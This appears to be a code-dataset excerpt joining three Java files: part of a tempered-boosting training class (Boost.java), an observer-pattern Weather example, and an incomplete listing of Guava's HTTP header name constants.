if ((SAVE_PARAMETERS_DURING_TRAINING) || (j == max_number_tree - 1)) {
sequence_min_codensity.addElement(new Double(min_codensity[j]));
sequence_max_codensity.addElement(new Double(max_codensity[j]));
}
if (j % 10 == 0) System.out.print(myDomain.memString());
}
if (SAVE_PARAMETERS_DURING_TRAINING) {
sequence_sequence_empirical_risks.addElement(sequence_empirical_risks);
sequence_sequence_true_risks.addElement(sequence_true_risks);
sequence_sequence_empirical_risks_MonotonicTreeGraph.addElement(
sequence_empirical_risks_MonotonicTreeGraph);
sequence_sequence_true_risks_MonotonicTreeGraph.addElement(
sequence_true_risks_MonotonicTreeGraph);
sequence_sequence_min_codensity.addElement(sequence_min_codensity);
sequence_sequence_max_codensity.addElement(sequence_max_codensity);
}
allTrees = new DecisionTree[max_number_tree];
allLeveragingCoefficients = new double[max_number_tree];
for (j = 0; j < max_number_tree; j++) {
allTrees[j] = (DecisionTree) all_trees.elementAt(j);
recordAllTrees[i][j] = allTrees[j];
allLeveragingCoefficients[j] =
((Double) all_leveraging_coefficients.elementAt(j)).doubleValue();
}
if (SAVE_CLASSIFIERS) save(i);
err_fin = (Double) sequence_empirical_risks.elementAt(sequence_empirical_risks.size() - 1);
perr_fin = (Double) sequence_true_risks.elementAt(sequence_true_risks.size() - 1);
card_nodes_fin =
(Integer) sequence_cardinal_nodes.elementAt(sequence_cardinal_nodes.size() - 1);
trees_fin = max_number_tree;
err_fin_MonotonicTreeGraph =
(Double)
sequence_empirical_risks_MonotonicTreeGraph.elementAt(
sequence_empirical_risks_MonotonicTreeGraph.size() - 1);
perr_fin_MonotonicTreeGraph =
(Double)
sequence_true_risks_MonotonicTreeGraph.elementAt(
sequence_true_risks_MonotonicTreeGraph.size() - 1);
v_cur.addElement(new Double(err_fin));
v_cur.addElement(new Double(perr_fin));
v_cur.addElement(new Double((double) trees_fin));
v_cur.addElement(new Double((double) card_nodes_fin));
v_cur.addElement(new Double(err_fin_MonotonicTreeGraph));
v_cur.addElement(new Double(perr_fin_MonotonicTreeGraph));
v.addElement(v_cur);
System.out.print(
"ok. \t(e-err t-err #nodes) = ("
+ DF.format(err_fin)
+ " "
+ DF.format(perr_fin)
+ " "
+ ((int) card_nodes_fin)
+ " -- "
+ DF.format(err_fin_MonotonicTreeGraph)
+ " "
+ DF.format(perr_fin_MonotonicTreeGraph)
+ ")");
System.out.println(" (" + TemperedBoostException.STATUS() + ")");
}
if (SAVE_PARAMETERS_DURING_TRAINING) {
double[] avg_sequence_empirical_risks = new double[max_number_tree];
double[] stddev_sequence_empirical_risks = new double[max_number_tree];
double[] avg_sequence_true_risks = new double[max_number_tree];
double[] stddev_sequence_true_risks = new double[max_number_tree];
double[] avg_sequence_empirical_risks_MonotonicTreeGraph = new double[max_number_tree];
double[] stddev_sequence_empirical_risks_MonotonicTreeGraph = new double[max_number_tree];
double[] avg_sequence_true_risks_MonotonicTreeGraph = new double[max_number_tree];
double[] stddev_sequence_true_risks_MonotonicTreeGraph = new double[max_number_tree];
double[] avg_sequence_min_codensity = new double[max_number_tree];
double[] stddev_sequence_min_codensity = new double[max_number_tree];
double[] avg_sequence_max_codensity = new double[max_number_tree];
double[] stddev_sequence_max_codensity = new double[max_number_tree];
double[] dumseq;
double[] avestd = new double[2];
for (j = 0; j < max_number_tree; j++) {
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] = sequence_sequence_empirical_risks.elementAt(i).elementAt(j).doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_empirical_risks[j] = avestd[0];
stddev_sequence_empirical_risks[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] = sequence_sequence_true_risks.elementAt(i).elementAt(j).doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_true_risks[j] = avestd[0];
stddev_sequence_true_risks[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] =
sequence_sequence_empirical_risks_MonotonicTreeGraph
.elementAt(i)
.elementAt(j)
.doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_empirical_risks_MonotonicTreeGraph[j] = avestd[0];
stddev_sequence_empirical_risks_MonotonicTreeGraph[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] =
sequence_sequence_true_risks_MonotonicTreeGraph
.elementAt(i)
.elementAt(j)
.doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_true_risks_MonotonicTreeGraph[j] = avestd[0];
stddev_sequence_true_risks_MonotonicTreeGraph[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] = sequence_sequence_min_codensity.elementAt(i).elementAt(j).doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_min_codensity[j] = avestd[0];
stddev_sequence_min_codensity[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] = sequence_sequence_max_codensity.elementAt(i).elementAt(j).doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_max_codensity[j] = avestd[0];
stddev_sequence_max_codensity[j] = avestd[1];
}
save(
avg_sequence_empirical_risks,
stddev_sequence_empirical_risks,
avg_sequence_true_risks,
stddev_sequence_true_risks,
avg_sequence_empirical_risks_MonotonicTreeGraph,
stddev_sequence_empirical_risks_MonotonicTreeGraph,
avg_sequence_true_risks_MonotonicTreeGraph,
stddev_sequence_true_risks_MonotonicTreeGraph,
avg_sequence_min_codensity,
stddev_sequence_min_codensity,
avg_sequence_max_codensity,
stddev_sequence_max_codensity,
index_algo - 1);
}
System.out.println("");
return v;
}
public void save(
double[] ae,
double[] se,
double[] at,
double[] st,
double[] ae_MonotonicTreeGraph,
double[] se_MonotonicTreeGraph,
double[] at_MonotonicTreeGraph,
double[] st_MonotonicTreeGraph,
double[] amincod,
double[] smincod,
double[] amaxcod,
double[] smaxcod,
int index_algo) {
String nameSave =
myDomain.myDS.pathSave + "results_" + Utils.NOW + "_Algo" + index_algo + ".txt";
int i;
FileWriter f;
try {
f = new FileWriter(nameSave);
f.write(
"#Iter\tE_em_a\tE_em_s\tE_te_a\tE_te_s\tMDT_e_a\tMDT_e_s\tMDT_t_a\tMDT_t_s\tMinc_a"
+ "\tMinc_s\tMaxc_a\tMaxc_s\n");
for (i = 0; i < ae.length; i++)
f.write(
i
+ "\t"
+ DF.format(ae[i])
+ "\t"
+ DF.format(se[i])
+ "\t"
+ DF.format(at[i])
+ "\t"
+ DF.format(st[i])
+ "\t"
+ DF.format(ae_MonotonicTreeGraph[i])
+ "\t"
+ DF.format(se_MonotonicTreeGraph[i])
+ "\t"
+ DF.format(at_MonotonicTreeGraph[i])
+ "\t"
+ DF.format(st_MonotonicTreeGraph[i])
+ "\t"
+ DF8.format(amincod[i])
+ "\t"
+ DF8.format(smincod[i])
+ "\t"
+ DF8.format(amaxcod[i])
+ "\t"
+ DF8.format(smaxcod[i])
+ "\n");
f.close();
} catch (IOException e) {
Dataset.perror("Boost.class :: Saving results error in file " + nameSave);
}
}
public void save(int split_CV) {
System.out.print(" {Saving classifier... ");
String nameSave = myDomain.myDS.pathSave + "classifiers_" + Utils.NOW + ".txt";
FileWriter f = null;
try {
f = new FileWriter(nameSave, true);
f.write(
"=====> "
+ fullName()
+ " -- Fold "
+ (split_CV + 1)
+ " / "
+ NUMBER_STRATIFIED_CV
+ ": "
+ classifierToString());
f.close();
} catch (IOException e) {
Dataset.perror("LinearBoost.class :: Saving results error in file " + nameSave);
}
System.out.print("ok.} ");
}
public String classifierToString() {
String v = "H = ";
int i;
for (i = 0; i < max_number_tree; i++) {
v += "(" + DF.format(allLeveragingCoefficients[i]) + " * T#" + i + ")";
if (i < max_number_tree - 1) v += " + ";
}
v += " (" + clamping + "), where\n\n";
for (i = 0; i < max_number_tree; i++) {
v += "T#" + i + " = " + allTrees[i].toString();
v += "\n";
}
v += "\n";
return v;
}
public DecisionTree oneTree(int iter, int split_CV) {
DecisionTree dumTree;
dumTree = new DecisionTree(iter, this, max_size_tree, split_CV);
dumTree.init(tempered_t);
dumTree.grow_heavy_first();
return dumTree;
}
// TEMPERED VERSION for reweighting
public void reweight_examples_infinite_weight(
DecisionTree dt, double mu, int split_CV, Vector<Double> all_zs) {
// triggered if infinite weights => restricts support to infinite weights
int i, ne = myDomain.myDS.train_size(split_CV), nzw = 0;
double zz, ww, dumw, totsize = 0.0, newweight;
Example ee;
Vector<Integer> indexes_infinite = new Vector<>();
double[] last_weights = new double[ne];
double gz = 0.0;
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
ww = ee.current_boosting_weight; // tempered weight
last_weights[i] = ww;
try {
dumw =
Statistics.TEMPERED_PRODUCT(
ww,
Statistics.TEMPERED_EXP(
-mu * dt.output_boosting(ee) * ee.noisy_normalized_class, tempered_t),
tempered_t);
// Use the noisy class, for training (if no noise, just the regular class)
} catch (TemperedBoostException eee) {
indexes_infinite.addElement(new Integer(i));
totsize += 1.0;
TemperedBoostException.ADD(TemperedBoostException.INFINITE_WEIGHTS);
}
}
newweight = 1.0 / Math.pow(totsize, Statistics.STAR(tempered_t));
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
if (indexes_infinite.contains(new Integer(i))) ee.current_boosting_weight = newweight;
else ee.current_boosting_weight = 0.0;
gz +=
ee.current_boosting_weight
* ((2.0 - tempered_t) * Statistics.H_T(last_weights[i], tempered_t)
- Statistics.H_T(ee.current_boosting_weight, tempered_t));
}
gz /= ((1.0 - tempered_t) * (1.0 - tempered_t));
grad_Z = gz;
if (adaptive_t) next_t = Math.max(0.0, Math.min(1.0, tempered_t - (grad_Z * Boost.COEFF_GRAD)));
all_zs.addElement(new Double(1.0));
}
public void reweight_examples_log_loss(DecisionTree dt, double mu, int split_CV) {
int i, ne = myDomain.myDS.train_size(split_CV);
double ww, den;
Example ee;
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
ww = ee.current_boosting_weight;
den = ww + ((1.0 - ww) * Math.exp(mu * dt.unweighted_edge_training(ee)));
ee.current_boosting_weight = ww / den;
if ((ee.current_boosting_weight <= 0.0) || (ee.current_boosting_weight >= 1.0))
Dataset.perror(
"Boost.class :: example " + ee + "has weight = " + ee.current_boosting_weight);
}
}
public void reweight_examples_tempered_loss(
DecisionTree dt,
double mu,
int split_CV,
Vector<Double> all_zs,
int j,
double[] min_codensity,
double[] max_codensity)
throws TemperedBoostException {
int i, ne = myDomain.myDS.train_size(split_CV), nzw = 0;
double zz, ww, dumw, z_j = 0.0, factor, minw = -1.0, expt, mindens = -1.0, maxdens = -1.0, dens;
Example ee;
boolean found = false;
double[] last_weights = new double[ne];
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
ww = ee.current_boosting_weight; // tempered weight
last_weights[i] = ww;
expt = Statistics.TEMPERED_EXP(-mu * dt.unweighted_edge_training(ee), tempered_t);
dumw = Statistics.TEMPERED_PRODUCT(ww, expt, tempered_t);
// Use the noisy class, for training (if no noise, just the regular class)
if (tempered_t == 1.0) z_j += dumw;
else z_j += Math.pow(dumw, 2.0 - tempered_t);
ee.current_boosting_weight = dumw;
if (dumw == 0) {
nzw++;
TemperedBoostException.ADD(TemperedBoostException.ZERO_WEIGHTS);
}
if ((ee.current_boosting_weight != 0.0)
&& ((!found) || (ee.current_boosting_weight < minw))) {
minw = ee.current_boosting_weight;
found = true;
}
}
if ((tempered_t == 1.0) && (nzw == 0)) {
// some zero weights for AdaBoost, replace them with minimal !=0 weight
z_j = 0.0;
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
if (ee.current_boosting_weight == 0.0) {
ee.current_boosting_weight = minw;
TemperedBoostException.ADD(TemperedBoostException.ZERO_WEIGHTS);
}
z_j += ee.current_boosting_weight;
}
}
if (z_j == 0.0) Dataset.perror("Boost.class :: no >0 tempered weight");
if (tempered_t != 1.0) z_j = Math.pow(z_j, Statistics.STAR(tempered_t));
all_zs.addElement(new Double(z_j));
double gz = 0.0;
double pnext2, pprev2, pprev1;
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
ee.current_boosting_weight /= z_j;
pprev1 = Math.pow(last_weights[i], 1.0 - tempered_t);
pprev2 = Math.pow(last_weights[i], 2.0 - tempered_t);
pnext2 = Math.pow(ee.current_boosting_weight, 2.0 - tempered_t);
gz += (pnext2 * Math.log(pnext2)) / (2.0 - tempered_t);
gz -= ee.current_boosting_weight * pprev1 * Math.log(pprev2);
if ((TemperedBoostException.MIN_WEIGHT == -1.0)
|| (ee.current_boosting_weight < TemperedBoostException.MIN_WEIGHT))
TemperedBoostException.MIN_WEIGHT = ee.current_boosting_weight;
dens = Math.pow(ee.current_boosting_weight, 2.0 - tempered_t);
if ((i == 0) || (dens < mindens)) mindens = dens;
if ((i == 0) || (dens > maxdens)) maxdens = dens;
if (Double.isNaN(ee.current_boosting_weight))
Dataset.perror("Example " + i + " has NaN weight");
}
gz /= Math.abs(1.0 - tempered_t);
grad_Z = gz;
if (adaptive_t) {
next_t = Math.max(0.0, Math.min(1.0, tempered_t - (grad_Z * Boost.COEFF_GRAD)));
System.out.print("[" + DF.format(tempered_t) + "]");
}
min_codensity[j] = mindens;
max_codensity[j] = maxdens;
}
public double ensemble_error_noise_free(
Vector all_trees,
Vector all_leveraging_coefficients,
boolean onTraining,
int split_CV,
boolean use_MonotonicTreeGraph) {
// uses the true label for all computations
if ((all_trees == null) || (all_trees.size() == 0))
Dataset.perror("Boost.class :: no trees to compute the error");
Example ee;
DecisionTree tt;
double sumerr = 0.0, output, coeff, sum, sumtree = 0.0, totedge, sum_weights = 0.0;
int i, j, ne;
if (onTraining) ne = myDomain.myDS.train_size(split_CV);
else ne = myDomain.myDS.test_size(split_CV);
if (ne == 0) Dataset.perror("DecisionTree.class :: zero sample size to compute the error");
for (i = 0; i < ne; i++) {
sumtree = 0.0;
if (onTraining) ee = myDomain.myDS.train_example(split_CV, i);
else ee = myDomain.myDS.test_example(split_CV, i);
if (onTraining) sum_weights += ee.current_boosting_weight;
for (j = 0; j < all_trees.size(); j++) {
tt = (DecisionTree) all_trees.elementAt(j);
if (use_MonotonicTreeGraph) output = tt.output_boosting_MonotonicTreeGraph(ee);
else output = tt.output_boosting(ee);
coeff = ((Double) all_leveraging_coefficients.elementAt(j)).doubleValue();
sumtree += (coeff * output);
if (clamping.equals(Algorithm.CLAMPED))
sumtree = Statistics.CLAMP_CLASSIFIER(sumtree, tempered_t);
}
if (sumtree == 0.0) {
// random guess
if (Utils.RANDOM_P_NOT_HALF() < 0.5) sumtree = -1.0;
else sumtree = 1.0;
}
if (ee.normalized_class == 0.0)
Dataset.perror("Boost.class :: Example " + ee + " has zero class");
totedge = sumtree * ee.normalized_class;
if (totedge < 0.0) sumerr += 1.0;
}
sumerr /= (double) ne;
return sumerr;
}
}
| google-research/google-research | tempered_boosting/Boost.java |
1,138 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.observer;
import java.util.ArrayList;
import java.util.List;
import lombok.extern.slf4j.Slf4j;
/**
* Weather can be observed by implementing {@link WeatherObserver} interface and registering as
* listener.
*/
@Slf4j
public class Weather {
private WeatherType currentWeather;
private final List<WeatherObserver> observers;
public Weather() {
observers = new ArrayList<>();
currentWeather = WeatherType.SUNNY;
}
public void addObserver(WeatherObserver obs) {
observers.add(obs);
}
public void removeObserver(WeatherObserver obs) {
observers.remove(obs);
}
/**
* Makes time pass for weather.
*/
public void timePasses() {
var enumValues = WeatherType.values();
currentWeather = enumValues[(currentWeather.ordinal() + 1) % enumValues.length];
LOGGER.info("The weather changed to {}.", currentWeather);
notifyObservers();
}
private void notifyObservers() {
for (var obs : observers) {
obs.update(currentWeather);
}
}
}
| smedals/java-design-patterns | observer/src/main/java/com/iluwatar/observer/Weather.java |
1,139 | /*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.net;
import com.google.common.annotations.GwtCompatible;
/**
* Contains constant definitions for the HTTP header field names. See:
*
* <ul>
* <li><a href="http://www.ietf.org/rfc/rfc2109.txt">RFC 2109</a>
* <li><a href="http://www.ietf.org/rfc/rfc2183.txt">RFC 2183</a>
* <li><a href="http://www.ietf.org/rfc/rfc2616.txt">RFC 2616</a>
* <li><a href="http://www.ietf.org/rfc/rfc2965.txt">RFC 2965</a>
* <li><a href="http://www.ietf.org/rfc/rfc5988.txt">RFC 5988</a>
* </ul>
*
* @author Kurt Alfred Kluever
* @since 11.0
*/
@GwtCompatible
@ElementTypesAreNonnullByDefault
public final class HttpHeaders {
private HttpHeaders() {}
// HTTP Request and Response header fields
/** The HTTP {@code Cache-Control} header field name. */
public static final String CACHE_CONTROL = "Cache-Control";
/** The HTTP {@code Content-Length} header field name. */
public static final String CONTENT_LENGTH = "Content-Length";
/** The HTTP {@code Content-Type} header field name. */
public static final String CONTENT_TYPE = "Content-Type";
/** The HTTP {@code Date} header field name. */
public static final String DATE = "Date";
/** The HTTP {@code Pragma} header field name. */
public static final String PRAGMA = "Pragma";
/** The HTTP {@code Via} header field name. */
public static final String VIA = "Via";
/** The HTTP {@code Warning} header field name. */
public static final String WARNING = "Warning";
// HTTP Request header fields
/** The HTTP {@code Accept} header field name. */
public static final String ACCEPT = "Accept";
/** The HTTP {@code Accept-Charset} header field name. */
public static final String ACCEPT_CHARSET = "Accept-Charset";
/** The HTTP {@code Accept-Encoding} header field name. */
public static final String ACCEPT_ENCODING = "Accept-Encoding";
/** The HTTP {@code Accept-Language} header field name. */
public static final String ACCEPT_LANGUAGE = "Accept-Language";
/** The HTTP {@code Access-Control-Request-Headers} header field name. */
public static final String ACCESS_CONTROL_REQUEST_HEADERS = "Access-Control-Request-Headers";
/** The HTTP {@code Access-Control-Request-Method} header field name. */
public static final String ACCESS_CONTROL_REQUEST_METHOD = "Access-Control-Request-Method";
/** The HTTP {@code Authorization} header field name. */
public static final String AUTHORIZATION = "Authorization";
/** The HTTP {@code Connection} header field name. */
public static final String CONNECTION = "Connection";
/** The HTTP {@code Cookie} header field name. */
public static final String COOKIE = "Cookie";
/**
* The HTTP <a href="https://fetch.spec.whatwg.org/#cross-origin-resource-policy-header">{@code
* Cross-Origin-Resource-Policy}</a> header field name.
*
* @since 28.0
*/
public static final String CROSS_ORIGIN_RESOURCE_POLICY = "Cross-Origin-Resource-Policy";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc8470">{@code Early-Data}</a> header field
* name.
*
* @since 27.0
*/
public static final String EARLY_DATA = "Early-Data";
/** The HTTP {@code Expect} header field name. */
public static final String EXPECT = "Expect";
/** The HTTP {@code From} header field name. */
public static final String FROM = "From";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc7239">{@code Forwarded}</a> header field name.
*
* @since 20.0
*/
public static final String FORWARDED = "Forwarded";
/**
* The HTTP {@code Follow-Only-When-Prerender-Shown} header field name.
*
* @since 17.0
*/
public static final String FOLLOW_ONLY_WHEN_PRERENDER_SHOWN = "Follow-Only-When-Prerender-Shown";
/** The HTTP {@code Host} header field name. */
public static final String HOST = "Host";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc7540#section-3.2.1">{@code HTTP2-Settings}
* </a> header field name.
*
* @since 24.0
*/
public static final String HTTP2_SETTINGS = "HTTP2-Settings";
/** The HTTP {@code If-Match} header field name. */
public static final String IF_MATCH = "If-Match";
/** The HTTP {@code If-Modified-Since} header field name. */
public static final String IF_MODIFIED_SINCE = "If-Modified-Since";
/** The HTTP {@code If-None-Match} header field name. */
public static final String IF_NONE_MATCH = "If-None-Match";
/** The HTTP {@code If-Range} header field name. */
public static final String IF_RANGE = "If-Range";
/** The HTTP {@code If-Unmodified-Since} header field name. */
public static final String IF_UNMODIFIED_SINCE = "If-Unmodified-Since";
/** The HTTP {@code Last-Event-ID} header field name. */
public static final String LAST_EVENT_ID = "Last-Event-ID";
/** The HTTP {@code Max-Forwards} header field name. */
public static final String MAX_FORWARDS = "Max-Forwards";
/** The HTTP {@code Origin} header field name. */
public static final String ORIGIN = "Origin";
/**
* The HTTP <a href="https://github.com/WICG/origin-isolation">{@code Origin-Isolation}</a> header
* field name.
*
* @since 30.1
*/
public static final String ORIGIN_ISOLATION = "Origin-Isolation";
/** The HTTP {@code Proxy-Authorization} header field name. */
public static final String PROXY_AUTHORIZATION = "Proxy-Authorization";
/** The HTTP {@code Range} header field name. */
public static final String RANGE = "Range";
/** The HTTP {@code Referer} header field name. */
public static final String REFERER = "Referer";
/**
* The HTTP <a href="https://www.w3.org/TR/referrer-policy/">{@code Referrer-Policy}</a> header
* field name.
*
* @since 23.4
*/
public static final String REFERRER_POLICY = "Referrer-Policy";
/**
* Values for the <a href="https://www.w3.org/TR/referrer-policy/">{@code Referrer-Policy}</a>
* header.
*
* @since 23.4
*/
public static final class ReferrerPolicyValues {
private ReferrerPolicyValues() {}
public static final String NO_REFERRER = "no-referrer";
public static final String NO_REFFERER_WHEN_DOWNGRADE = "no-referrer-when-downgrade";
public static final String SAME_ORIGIN = "same-origin";
public static final String ORIGIN = "origin";
public static final String STRICT_ORIGIN = "strict-origin";
public static final String ORIGIN_WHEN_CROSS_ORIGIN = "origin-when-cross-origin";
public static final String STRICT_ORIGIN_WHEN_CROSS_ORIGIN = "strict-origin-when-cross-origin";
public static final String UNSAFE_URL = "unsafe-url";
}
/**
* The HTTP <a href="https://www.w3.org/TR/service-workers/#update-algorithm">{@code
* Service-Worker}</a> header field name.
*
* @since 20.0
*/
public static final String SERVICE_WORKER = "Service-Worker";
/** The HTTP {@code TE} header field name. */
public static final String TE = "TE";
/** The HTTP {@code Upgrade} header field name. */
public static final String UPGRADE = "Upgrade";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-upgrade-insecure-requests/#preference">{@code
* Upgrade-Insecure-Requests}</a> header field name.
*
* @since 28.1
*/
public static final String UPGRADE_INSECURE_REQUESTS = "Upgrade-Insecure-Requests";
/** The HTTP {@code User-Agent} header field name. */
public static final String USER_AGENT = "User-Agent";
// HTTP Response header fields
/** The HTTP {@code Accept-Ranges} header field name. */
public static final String ACCEPT_RANGES = "Accept-Ranges";
/** The HTTP {@code Access-Control-Allow-Headers} header field name. */
public static final String ACCESS_CONTROL_ALLOW_HEADERS = "Access-Control-Allow-Headers";
/** The HTTP {@code Access-Control-Allow-Methods} header field name. */
public static final String ACCESS_CONTROL_ALLOW_METHODS = "Access-Control-Allow-Methods";
/** The HTTP {@code Access-Control-Allow-Origin} header field name. */
public static final String ACCESS_CONTROL_ALLOW_ORIGIN = "Access-Control-Allow-Origin";
/**
* The HTTP <a href="https://wicg.github.io/private-network-access/#headers">{@code
* Access-Control-Allow-Private-Network}</a> header field name.
*
* @since 31.1
*/
public static final String ACCESS_CONTROL_ALLOW_PRIVATE_NETWORK =
"Access-Control-Allow-Private-Network";
/** The HTTP {@code Access-Control-Allow-Credentials} header field name. */
public static final String ACCESS_CONTROL_ALLOW_CREDENTIALS = "Access-Control-Allow-Credentials";
/** The HTTP {@code Access-Control-Expose-Headers} header field name. */
public static final String ACCESS_CONTROL_EXPOSE_HEADERS = "Access-Control-Expose-Headers";
/** The HTTP {@code Access-Control-Max-Age} header field name. */
public static final String ACCESS_CONTROL_MAX_AGE = "Access-Control-Max-Age";
/** The HTTP {@code Age} header field name. */
public static final String AGE = "Age";
/** The HTTP {@code Allow} header field name. */
public static final String ALLOW = "Allow";
/** The HTTP {@code Content-Disposition} header field name. */
public static final String CONTENT_DISPOSITION = "Content-Disposition";
/** The HTTP {@code Content-Encoding} header field name. */
public static final String CONTENT_ENCODING = "Content-Encoding";
/** The HTTP {@code Content-Language} header field name. */
public static final String CONTENT_LANGUAGE = "Content-Language";
/** The HTTP {@code Content-Location} header field name. */
public static final String CONTENT_LOCATION = "Content-Location";
/** The HTTP {@code Content-MD5} header field name. */
public static final String CONTENT_MD5 = "Content-MD5";
/** The HTTP {@code Content-Range} header field name. */
public static final String CONTENT_RANGE = "Content-Range";
/**
* The HTTP <a href="http://w3.org/TR/CSP/#content-security-policy-header-field">{@code
* Content-Security-Policy}</a> header field name.
*
* @since 15.0
*/
public static final String CONTENT_SECURITY_POLICY = "Content-Security-Policy";
/**
* The HTTP <a href="http://w3.org/TR/CSP/#content-security-policy-report-only-header-field">
* {@code Content-Security-Policy-Report-Only}</a> header field name.
*
* @since 15.0
*/
public static final String CONTENT_SECURITY_POLICY_REPORT_ONLY =
"Content-Security-Policy-Report-Only";
/**
* The HTTP nonstandard {@code X-Content-Security-Policy} header field name. It was introduced in
* <a href="https://www.w3.org/TR/2011/WD-CSP-20111129/">CSP v.1</a> and used by the Firefox until
* version 23 and the Internet Explorer version 10. Please, use {@link #CONTENT_SECURITY_POLICY}
* to pass the CSP.
*
* @since 20.0
*/
public static final String X_CONTENT_SECURITY_POLICY = "X-Content-Security-Policy";
/**
* The HTTP nonstandard {@code X-Content-Security-Policy-Report-Only} header field name. It was
* introduced in <a href="https://www.w3.org/TR/2011/WD-CSP-20111129/">CSP v.1</a> and used by the
* Firefox until version 23 and the Internet Explorer version 10. Please, use {@link
* #CONTENT_SECURITY_POLICY_REPORT_ONLY} to pass the CSP.
*
* @since 20.0
*/
public static final String X_CONTENT_SECURITY_POLICY_REPORT_ONLY =
"X-Content-Security-Policy-Report-Only";
/**
* The HTTP nonstandard {@code X-WebKit-CSP} header field name. It was introduced in <a
* href="https://www.w3.org/TR/2011/WD-CSP-20111129/">CSP v.1</a> and used by the Chrome until
* version 25. Please, use {@link #CONTENT_SECURITY_POLICY} to pass the CSP.
*
* @since 20.0
*/
public static final String X_WEBKIT_CSP = "X-WebKit-CSP";
/**
* The HTTP nonstandard {@code X-WebKit-CSP-Report-Only} header field name. It was introduced in
* <a href="https://www.w3.org/TR/2011/WD-CSP-20111129/">CSP v.1</a> and used by the Chrome until
* version 25. Please, use {@link #CONTENT_SECURITY_POLICY_REPORT_ONLY} to pass the CSP.
*
* @since 20.0
*/
public static final String X_WEBKIT_CSP_REPORT_ONLY = "X-WebKit-CSP-Report-Only";
/**
* The HTTP <a href="https://wicg.github.io/cross-origin-embedder-policy/#COEP">{@code
* Cross-Origin-Embedder-Policy}</a> header field name.
*
* @since 30.0
*/
public static final String CROSS_ORIGIN_EMBEDDER_POLICY = "Cross-Origin-Embedder-Policy";
/**
* The HTTP <a href="https://wicg.github.io/cross-origin-embedder-policy/#COEP-RO">{@code
* Cross-Origin-Embedder-Policy-Report-Only}</a> header field name.
*
* @since 30.0
*/
public static final String CROSS_ORIGIN_EMBEDDER_POLICY_REPORT_ONLY =
"Cross-Origin-Embedder-Policy-Report-Only";
/**
* The HTTP Cross-Origin-Opener-Policy header field name.
*
* @since 28.2
*/
public static final String CROSS_ORIGIN_OPENER_POLICY = "Cross-Origin-Opener-Policy";
/** The HTTP {@code ETag} header field name. */
public static final String ETAG = "ETag";
/** The HTTP {@code Expires} header field name. */
public static final String EXPIRES = "Expires";
/** The HTTP {@code Last-Modified} header field name. */
public static final String LAST_MODIFIED = "Last-Modified";
/** The HTTP {@code Link} header field name. */
public static final String LINK = "Link";
/** The HTTP {@code Location} header field name. */
public static final String LOCATION = "Location";
/**
* The HTTP {@code Keep-Alive} header field name.
*
* @since 31.0
*/
public static final String KEEP_ALIVE = "Keep-Alive";
/**
* The HTTP <a href="https://github.com/WICG/nav-speculation/blob/main/no-vary-search.md">{@code
* No-Vary-Seearch}</a> header field name.
*
* @since 32.0.0
*/
public static final String NO_VARY_SEARCH = "No-Vary-Search";
/**
* The HTTP <a href="https://googlechrome.github.io/OriginTrials/#header">{@code Origin-Trial}</a>
* header field name.
*
* @since 27.1
*/
public static final String ORIGIN_TRIAL = "Origin-Trial";
/** The HTTP {@code P3P} header field name. Limited browser support. */
public static final String P3P = "P3P";
/** The HTTP {@code Proxy-Authenticate} header field name. */
